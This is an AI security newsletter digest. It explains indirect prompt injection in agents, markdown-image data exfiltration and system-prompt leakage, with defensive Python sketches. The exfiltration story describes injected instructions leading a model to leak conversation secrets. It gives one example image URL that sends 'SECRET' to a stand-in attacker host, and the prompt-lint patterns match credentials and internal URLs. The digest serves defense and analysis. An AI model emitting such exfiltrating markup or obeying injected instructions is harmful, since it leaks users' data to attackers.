AI Sec Weekly: Friday, May 15, 2026
This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps failing. Plus one regulatory item, one technical item, and the reading list. Verify specifics against primary sources.
Friday digest. Same structure as always: three top stories, one regulatory item, one technical item, the reading list, corrections. As the “how this works” page explains, I rank ruthlessly and leave out anything I can’t stand behind. Where a claim depends on a CVE, version, or date, verify it against the primary source before you act; this digest is analysis, not an advisory feed.
Top three
1. Indirect prompt injection is now the agent era’s default vulnerability — treat it as a design property. The week’s most useful framing, which I wrote up separately, is that the injection that matters no longer arrives in the user’s message box. It arrives in the page an agent fetched, the email it summarized, the document a user uploaded, the record it pulled from a “trusted” store. In an agent architecture this is closer to a design property than a bug, because to the model the system prompt, the user request, and the retrieved document are the same kind of thing — tokens. You cannot make the model immune; you can make a successful injection not matter, through privilege separation, untrusted-by-default model output, and human-in-the-loop gates on irreversible actions. If you only red-team the chat box, you’re measuring the wrong surface.
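To make the containment idea concrete, here is a minimal sketch of a tool-call gate, assuming a setup where the orchestrator (not the model) decides whether a proposed call runs. The tool names, the `tainted` flag, and the `approve` callback are all hypothetical and stand in for whatever your agent framework provides.

```python
from dataclasses import dataclass, field
from typing import Callable

# Hypothetical tool names, grouped by how much damage a wrong call can do.
READ_ONLY = {"search_docs", "read_calendar"}
REVERSIBLE = {"create_draft", "add_label"}
IRREVERSIBLE = {"send_email", "delete_record"}


@dataclass(frozen=True)
class ToolCall:
    name: str
    args: dict = field(default_factory=dict)
    # Assumption: the orchestrator sets this once the model has read any
    # content the user did not write (fetched page, email, upload, record).
    tainted: bool = False


def decide(call: ToolCall, approve: Callable[[ToolCall], bool]) -> str:
    """Return "allow" or "deny" for a tool call proposed by the model."""
    if call.name in READ_ONLY:
        return "allow"
    if call.name in REVERSIBLE:
        # Untainted sessions may write; tainted ones need a human.
        if not call.tainted:
            return "allow"
        return "allow" if approve(call) else "deny"
    if call.name in IRREVERSIBLE:
        # Irreversible actions always go through the human gate.
        return "allow" if approve(call) else "deny"
    # Anything not explicitly classified is denied by default.
    return "deny"
```

The point of the shape is that the decision never depends on what the model says about its own intent, only on the tool’s class and whether untrusted content was in context. One caveat on the sketch: a “read-only” tool that fetches attacker-chosen URLs is not harmless, so the classification itself deserves review.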
2. LLM chatbots leak data through their own rendered output. The data-exfiltration class worth internalizing this week is the one where the model never “sends” anything itself: it just emits markdown, and the renderer makes the request. An injected instruction gets the model to embed an image (or a link the user then clicks) whose URL encodes secrets from the conversation; when the client renders that markdown, it fetches the attacker’s URL and the secrets ride along in the query string. The fix isn’t at the model layer at all. It is constraining what the rendering surface is allowed to auto-fetch (Content Security Policy, disallowing arbitrary external image loads, stripping or sandboxing model-emitted markup). I covered the mechanics in a separate post. The lesson that generalizes: the model’s output is an untrusted string, and anything downstream that auto-acts on it is part of your attack surface.
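As an illustration of the “stripping model-emitted markup” option, here is a small sketch that removes inline markdown images unless they point at an allowlisted HTTPS host. The host name and function name are assumptions for the example, and the regex only covers the inline `![alt](url)` form, not reference-style images or raw HTML, so treat it as defense in depth alongside a restrictive CSP rather than a replacement for one.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: hosts the client may auto-fetch images from.
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Inline markdown image: ![alt](url) or ![alt](url "title").
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")


def strip_untrusted_images(markdown: str) -> str:
    """Replace images from non-allowlisted hosts with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        try:
            parts = urlsplit(url)
            trusted = (
                parts.scheme == "https"
                and parts.hostname in ALLOWED_IMAGE_HOSTS
            )
        except ValueError:
            # Malformed URLs are treated as untrusted.
            trusted = False
        if trusted:
            return match.group(0)
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return IMAGE_RE.sub(replace, markdown)
```

Run this on model output before it reaches the renderer. An image such as `![x](https://evil.example/p.png?d=SECRET)` becomes a text placeholder, so the client never issues the request that would carry the query string.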
3. System-prompt secrecy keeps failing, and the OWASP 2025 list finally said so. The recurring own-goal is teams treating the system prompt as a secret and building product logic that assumes it stays one. It does not — it’s recoverable by a determined user. The 2025 OWASP LLM Top 10 promoting system-prompt leakage to its own category is an acknowledgment that this kept biting people. The correct posture, restated because it bears repeating: design as if the prompt leaks on day one. No credentials, no internal URLs, no unredacted business rules in there. See my breakdown of what changed in the 2025 list.
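One way to act on “design as if the prompt leaks” is a pre-deployment lint over the system prompt text. The sketch below is a heuristic under stated assumptions: the patterns and the internal-domain suffixes are illustrative guesses, not a complete secret scanner, and they will produce both false positives and misses.

```python
import re

# Illustrative patterns only; tune them to your own naming conventions.
CHECKS = {
    "possible credential": re.compile(
        r"(?i)\b(api[_-]?key|secret|password|token)\b\s*[:=]\s*\S+"
    ),
    "possible internal URL": re.compile(
        r"(?i)https?://[^\s/]*(\.internal|\.corp|\.local|localhost)\b\S*"
    ),
    "private IPv4 address": re.compile(
        r"\b(10\.\d{1,3}|192\.168|172\.(1[6-9]|2\d|3[01]))\.\d{1,3}\.\d{1,3}\b"
    ),
}


def lint_system_prompt(prompt: str) -> list[str]:
    """Return the labels of every check the prompt text trips."""
    return [label for label, pattern in CHECKS.items() if pattern.search(prompt)]
```

A non-empty result is a prompt to move that value out of the system prompt and behind an access-controlled tool or config lookup, not proof of a leak.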
Regulatory item
The EU AI Act is a phased schedule, not a single deadline — inventory by risk category now. The Act applies in stages: prohibited practices first, general-purpose-model obligations next, and the bulk of high-risk obligations later. The practical action for compliance and security teams is unchanged and worth doing this week: classify which of your systems fall into which risk tier, then track the specific application date for that tier against the official text ↗. I’m deliberately not quoting a single date — the schedule has moving parts and the official source is authoritative. The security-relevant obligations (risk management, logging, robustness, human oversight) are the ones to start mapping controls against.
Technical item
Adopt MITRE ATLAS as your finding taxonomy. Not a release, a recommendation: MITRE ATLAS ↗ is an established, maintained knowledge base of adversarial techniques against ML systems, structured like ATT&CK. It remains underused relative to its value. The concrete step: tag your next AI red-team finding with the relevant ATLAS technique. Six months of consistently tagged findings is a far more useful corpus than six months of prose, and it makes results comparable across engagements. Pair it with the OWASP LLM Top 10 for the application-layer view.
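A minimal sketch of what consistent tagging could look like in practice. The record fields are hypothetical, the ID pattern assumes the `AML.T` plus four digits form (with an optional three-digit sub-technique suffix) used on the ATLAS site, and the IDs in the usage note are placeholders, so look up the real technique ID for each finding.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Assumed ID shape: AML.T0000 or AML.T0000.000. Verify against ATLAS.
ATLAS_ID = re.compile(r"^AML\.T\d{4}(\.\d{3})?$")


@dataclass(frozen=True)
class Finding:
    title: str
    engagement: str
    atlas_technique: str  # one ATLAS technique ID per finding
    owasp_llm: str = ""   # optional OWASP LLM Top 10 entry

    def __post_init__(self) -> None:
        # Reject free-text tags so the corpus stays comparable.
        if not ATLAS_ID.match(self.atlas_technique):
            raise ValueError(f"not an ATLAS technique ID: {self.atlas_technique!r}")


def technique_counts(findings: list[Finding]) -> Counter:
    """Count findings per ATLAS technique across engagements."""
    return Counter(f.atlas_technique for f in findings)
```

With records like `Finding("Injected email triggers tool call", "2026-Q2", "AML.T0000")`, `technique_counts(...)` gives a per-technique tally you can compare across engagements, which is the payoff prose reports do not offer.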
The reading list
Links worth your time that didn’t make the top three. One line each: who, what, why bother.
- OWASP GenAI Security Project ↗ — the umbrella behind the LLM Top 10. Why bother: the canonical, vendor-neutral starting point for LLM application risk.
- MITRE ATLAS ↗ — adversarial technique knowledge base for AI. Why bother: the shared vocabulary your red and blue teams should both be using.
- NIST AI Risk Management Framework ↗ — the Govern/Map/Measure/Manage structure plus the Generative AI Profile. Why bother: the governance wrapper leadership and auditors recognize.
- OWASP LLM Top 10 ↗ — the 2025 revision. Why bother: re-read the system-prompt-leakage and supply-chain entries specifically.
Corrections
Nothing to correct from last week’s digest. As always, if I get something wrong, it gets fixed here with a visible note — I don’t quietly amend.
If you have a tip — a vendor advisory, a regulator action, a CVE pre-disclosure — reply to the digest. Sources protected.
— Theo